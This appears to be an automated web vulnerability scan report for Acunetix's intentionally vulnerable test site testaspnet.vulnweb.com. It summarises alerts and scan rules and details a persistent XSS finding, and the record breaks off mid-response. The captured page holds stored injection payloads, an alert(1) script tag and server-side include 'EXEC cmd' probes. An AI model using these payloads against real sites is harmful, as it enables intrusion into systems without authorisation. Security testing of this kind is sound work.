REPORT

Risk Level	Number of Alerts
High	4
Medium	3
Low	5
Informational	4

Name	Risk Level	Number of Instances
Cross Site Scripting (Persistent)	High	1
Cross Site Scripting (Reflected)	High	4
SQL Injection	High	3
SQL Injection - MsSQL	High	6
Absence of Anti-CSRF Tokens	Medium	29
Content Security Policy (CSP) Header Not Set	Medium	31
Missing Anti-clickjacking Header	Medium	30
Cookie without SameSite Attribute	Low	2
Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s)	Low	43
Server Leaks Version Information via "Server" HTTP Response Header Field	Low	43
X-AspNet-Version Response Header	Low	32
X-Content-Type-Options Header Missing	Low	40
Charset Mismatch (Header Versus Meta Content-Type Charset)	Informational	4
GET for POST	Informational	1
User Agent Fuzzer	Informational	95
User Controllable HTML Element Attribute (Potential XSS)	Informational	748

Name	Rule Type	Threshold	Strength
Directory Browsing	Active	MEDIUM	MEDIUM
CRLF Injection	Active	MEDIUM	MEDIUM
Path Traversal	Active	MEDIUM	MEDIUM
Remote File Inclusion	Active	MEDIUM	MEDIUM
Parameter Tampering	Active	MEDIUM	MEDIUM
Server Side Include	Active	MEDIUM	MEDIUM
Script Active Scan Rules	Active	MEDIUM	MEDIUM
Cross Site Scripting (Persistent) - Prime	Active	MEDIUM	MEDIUM
Cross Site Scripting (Persistent) - Spider	Active	MEDIUM	MEDIUM
SQL Injection - MySQL	Active	MEDIUM	MEDIUM
SQL Injection - Hypersonic SQL	Active	MEDIUM	MEDIUM
SQL Injection - Oracle	Active	MEDIUM	MEDIUM
SQL Injection - PostgreSQL	Active	MEDIUM	MEDIUM
SQL Injection - SQLite	Active	MEDIUM	MEDIUM
Cross Site Scripting (DOM Based)	Active	MEDIUM	MEDIUM
ELMAH Information Leak	Active	MEDIUM	MEDIUM
Trace.axd Information Leak	Active	MEDIUM	MEDIUM
XSLT Injection	Active	MEDIUM	MEDIUM
.htaccess Information Leak	Active	MEDIUM	MEDIUM
.env Information Leak	Active	MEDIUM	MEDIUM
Server Side Code Injection	Active	MEDIUM	MEDIUM
Hidden File Finder	Active	MEDIUM	MEDIUM
Remote OS Command Injection	Active	MEDIUM	MEDIUM
XML External Entity Attack	Active	MEDIUM	MEDIUM
Generic Padding Oracle	Active	MEDIUM	MEDIUM
SOAP Action Spoofing	Active	MEDIUM	MEDIUM
SOAP XML Injection	Active	MEDIUM	MEDIUM
Heartbleed OpenSSL Vulnerability	Active	MEDIUM	MEDIUM
Buffer Overflow	Active	MEDIUM	MEDIUM
Source Code Disclosure - CVE-2012-1823	Active	MEDIUM	MEDIUM
Format String Error	Active	MEDIUM	MEDIUM
Remote Code Execution - CVE-2012-1823	Active	MEDIUM	MEDIUM
Cloud Metadata Potentially Exposed	Active	MEDIUM	MEDIUM
External Redirect	Active	MEDIUM	MEDIUM
Source Code Disclosure - /WEB-INF folder	Active	MEDIUM	MEDIUM
Private IP Disclosure	Passive	MEDIUM	-
Session ID in URL Rewrite	Passive	MEDIUM	-
Insecure JSF ViewState	Passive	MEDIUM	-
Vulnerable JS Library (Powered by Retire.js)	Passive	MEDIUM	-
Cookie No HttpOnly Flag	Passive	MEDIUM	-
Cookie Without Secure Flag	Passive	MEDIUM	-
Re-examine Cache-control Directives	Passive	MEDIUM	-
Cross-Domain JavaScript Source File Inclusion	Passive	MEDIUM	-
Content-Type Header Missing	Passive	MEDIUM	-
Application Error Disclosure	Passive	MEDIUM	-
Information Disclosure - Debug Error Messages	Passive	MEDIUM	-
Information Disclosure - Sensitive Information in URL	Passive	MEDIUM	-
Information Disclosure - Sensitive Information in HTTP Referrer Header	Passive	MEDIUM	-
Information Disclosure - Suspicious Comments	Passive	MEDIUM	-
Open Redirect	Passive	MEDIUM	-
Cookie Poisoning	Passive	MEDIUM	-
User Controllable Charset	Passive	MEDIUM	-
WSDL File Detection	Passive	MEDIUM	-
Loosely Scoped Cookie	Passive	MEDIUM	-
Viewstate	Passive	MEDIUM	-
Directory Browsing	Passive	MEDIUM	-
Heartbleed OpenSSL Vulnerability (Indicative)	Passive	MEDIUM	-
Strict-Transport-Security Header	Passive	MEDIUM	-
X-Backend-Server Header Information Leak	Passive	MEDIUM	-
Secure Pages Include Mixed Content	Passive	MEDIUM	-
HTTP to HTTPS Insecure Transition in Form Post	Passive	MEDIUM	-
HTTPS to HTTP Insecure Transition in Form Post	Passive	MEDIUM	-
User Controllable JavaScript Event (XSS)	Passive	MEDIUM	-
Big Redirect Detected (Potential Sensitive Information Leak)	Passive	MEDIUM	-
Retrieved from Cache	Passive	MEDIUM	-
X-ChromeLogger-Data (XCOLD) Header Information Leak	Passive	MEDIUM	-
CSP	Passive	MEDIUM	-
X-Debug-Token Information Leak	Passive	MEDIUM	-
Username Hash Found	Passive	MEDIUM	-
PII Disclosure	Passive	MEDIUM	-
Script Passive Scan Rules	Passive	MEDIUM	-
Stats Passive Scan Rule	Passive	MEDIUM	-
Timestamp Disclosure	Passive	MEDIUM	-
Hash Disclosure	Passive	MEDIUM	-
Cross-Domain Misconfiguration	Passive	MEDIUM	-
Weak Authentication Method	Passive	MEDIUM	-
Reverse Tabnabbing	Passive	MEDIUM	-
Modern Web Application	Passive	MEDIUM	-

Sites

http://testaspnet.vulnweb.com

HTTP Response Code	Number of Responses
403 Forbidden	57
404 Not Found	113
405 Method Not Allowed	24
200 OK	8227
301 Moved Permanently	74
500 Internal Server Error	199
302 Found	2

No Authentication Statistics Found

Parameter Name	Type	Flags	Times Used	# Values

Alert Detail

High	Cross Site Scripting (Persistent)
Description	Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology. When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise. There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based. Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash. Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.

URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	GET
Parameter	tbComment
Attack	</div><script>alert(1);</script><div>
Evidence
Show / hide Request and Response
Request Header - size: 482 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:43:17 GMT Content-Length: 27686
Response Body - size: 27,686 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKR4/m+CgKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBIQvwSC5/udKtTPYZnABIZFF4Opg" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a> <DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:52 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:52 AM</DIV><DIV class="CommentText"><!--#EXEC cmd="dir \"--></DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:51 AM</DIV><DIV class="CommentText">"><!--#EXEC cmd="ls /"--><</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:01 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:51 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:51 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:13 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:16 AM</DIV><DIV class="CommentText">0W45pz4p</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:17 AM</DIV><DIV class="CommentText"></div><script>alert(1);</script><div></DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:52 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:51 AM</DIV><DIV class="CommentText"><!--#EXEC cmd="ls /"--></DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:52 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:52 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:09 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:09 AM</DIV><DIV class="CommentText">zApPX3sS</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:10 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:50 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:00 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:00 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:00 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:00 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG 